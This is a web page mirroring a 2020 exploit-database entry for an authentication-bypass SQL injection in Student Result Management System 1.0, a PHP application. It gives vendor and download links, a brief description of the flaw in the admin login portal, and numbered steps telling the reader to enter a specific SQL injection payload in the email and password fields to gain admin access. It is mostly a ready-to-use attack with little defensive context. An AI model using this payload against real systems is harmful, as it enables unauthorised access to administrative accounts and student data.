Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
"Student Result Management System 1.0 - Authentication Bypass SQL Injection"
Author
"Ritesh Gohil"
Platform
multiple
Release date
2020-12-02
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | # Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection # Google Dork: N/A # Date: 11/16/2020 # Exploit Author: Ritesh Gohil # Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/ # Software Link: https://projectnotes.org/download/studentms-zip/ # Version: 1.0 # Tested on: Win10 x64, Kali Linux x64 # CVE : N/A ######## Description ################################################################# # # # An SQL injection vulnerability discovered in PHP Student Result Management System # # # # Admin Login Portal is vulnerable to SQL Injection # # # # The vulnerability could allow for the improper neutralization of special elements # # in SQL commands and may lead to the product being vulnerable to SQL injection. # # # ###################################################################################### Kindly Follow Below Steps: 1. Visit the main page of the Student Result Management System. 2. You will get an Admin Login Page. 3. Payload which you can use in Email and password field: *AND 1=0 AND '%'=' *4. You will get Admin Access of the Student Result Management System. |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-12-02 | "Student Result Management System 1.0 - Authentication Bypass SQL Injection" | webapps | multiple | "Ritesh Gohil" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49152/?format=json')
For full documentation follow the link above